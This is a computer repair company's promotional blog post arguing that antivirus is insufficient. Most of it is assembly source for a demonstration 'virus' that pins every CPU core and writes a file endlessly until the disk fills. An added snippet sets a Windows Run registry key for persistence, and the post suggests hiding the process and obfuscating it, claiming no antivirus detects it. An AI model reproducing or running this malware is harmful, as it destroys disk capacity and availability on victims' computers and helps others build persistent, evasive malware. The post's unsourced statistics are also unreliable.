Why antivirus won’t protect you?

Simply having anti-virus software won’t protect your computer from online threats

As everyone knows simply having antivirus installed is not enough to protect your computer from online threats. Viruses are extremely clever nowadays and people creating them know how to write the code to be undetected by latest antivirus software.

Computer virus, malware, spyware is designed for several different purposes. From stealing your card details, bank details while you browse online, to display advertises on your computer or simply to slow down your computer.

Most computer repair companies only uses popular commercial anti-viruses to remove threats from customer computer. After few months later or even less, users computer will become infected again. Yes, even with up to date virus definitions, simply because their computers were not fully secured. The root of this problem is a lack of system security. Microsoft Windows’s default settings have a lot of unnecessary services running that users might never use, yet they are vulnerable to cyberattacks. Also no anti-virus will protect any computer with 100%. Most of our customers (95%) had anti-virus installed, yet they still had badly infected machines. According to Symantec, virus detection rate is only at 45%.

We at PCMarc – Computer repair not only remove viruses from user computers but also implement full system security, making sure that operating system is hardened to maximum. This will greatly decrease the chance of virus, malware and other infections on computers.

If you want us to secure your computer simply contact us.

Our security expert at PCMarc – Deko Gruntkowski has prepared an example of assembler virus that slows down your computer

.586 ; create 32 bit code
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive

include c:\masm32\include\windows.inc
include c:\masm32\include\masm32.inc
include c:\masm32\include\gdi32.inc
include c:\masm32\include\user32.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\Comctl32.inc
include c:\masm32\include\comdlg32.inc
include c:\masm32\include\shell32.inc
include c:\masm32\include\oleaut32.inc
include c:\masm32\include\msvcrt.inc
include c:\masm32\macros\macros.asm

includelib c:\masm32\lib\masm32.lib
includelib c:\masm32\lib\gdi32.lib
includelib c:\masm32\lib\user32.lib
includelib c:\masm32\lib\kernel32.lib
includelib c:\masm32\lib\Comctl32.lib
includelib c:\masm32\lib\comdlg32.lib
includelib c:\masm32\lib\shell32.lib
includelib c:\masm32\lib\oleaut32.lib
includelib c:\masm32\lib\msvcrt.lib

virus PROTO:DWORD

.data

lpFileName db “virus”,0
adrpass dd 0
temp db 4 dup(0)
file_handle db 4 dup(0)

.code

start:
invoke GetCurrentProcess
invoke SetPriorityClass,eax, IDLE_PRIORITY_CLASS
xor edx, edx
xor ecx, ecx
xor ebx, ebx
mov eax, 1h
cpuid
and ebx, 00FF0000h
shr ebx, 16
mov ecx, ebx ; numbers of CPU cores
push ecx
mov eax, 9
mul ecx
invoke VirtualAlloc, 0, ecx, MEM_COMMIT,PAGE_EXECUTE_READWRITE
mov adrpass, eax
pop ecx

run_threads:
push ecx
mov eax, adrpass
invoke CreateThread, 0, 0, offset virus, eax, 0, 0
mov eax, adrpass
add eax, 9
mov adrpass, eax
pop ecx
loop run_threads
ret

virus proc near adrespass:DWORD
pushad

start:
invoke CreateFile, offset lpFileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
mov dword ptr [file_handle], eax
st1:
invoke WriteFile, dword ptr [file_handle], adrespass, 1024, offset temp, 0
jmp st1
popad
ret
virus endp

end start

This application simply detect number of CPU cores in your system and then run process in virus proc using all CPU power and writes empty file “virus” filling it with 0x00 till you run out of disk space. This example also have high Disk usage which slows down your computer.

There is plenty of modification that could be applied to this code.

We could add system startup:

szRegistry db “Software\Microsoft\Windows\CurrentVersion\Run”,0
szProgName db “Virus”,0

@@:
call GetCommandLine
inc eax
push eax
mov esi,eax
mov edi,offset agfupxpath

lodsb
@@:
stosb
lodsb
cmp al,’”‘
jne @B
mov ecx,esi
@@:
dec esi
cmp byte ptr [esi],’\’
jne @B
mov byte ptr [esi],0
pop esi
mov edi,offset upxdir
@@:
lodsb
stosb
cmp al,0
jne @B

mov esi,ecx
mov edi,offset file1buffer
lodsb
cmp al,0
je cmdlinedone
@@:
lodsb
cmp al,0
je cmdlinedone
stosb
jmp @B

cmdlinedone:

invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szRegistry,0,KEY_ALL_ACCESS,addr hReg
test eax,eax
je @F

mov ecx, offset agfupxpath
invoke lstrlen,ecx
mov ecx, offset agfupxpath

invoke RegSetValueEx,hReg,offset szProgName,0,REG_SZ,ecx,eax
@@:

We could go further and use low level code to protect virus process or even hide it. We could also use code polimorphism or obfuscation to make it even harder for debug.

The code above is not detected by any antivirus software.

We can’t accept any responsibility or liability for damages arising from the misuse or loss of data or information of above code.

—-

PCMarc Team

PCMarc – Computer repair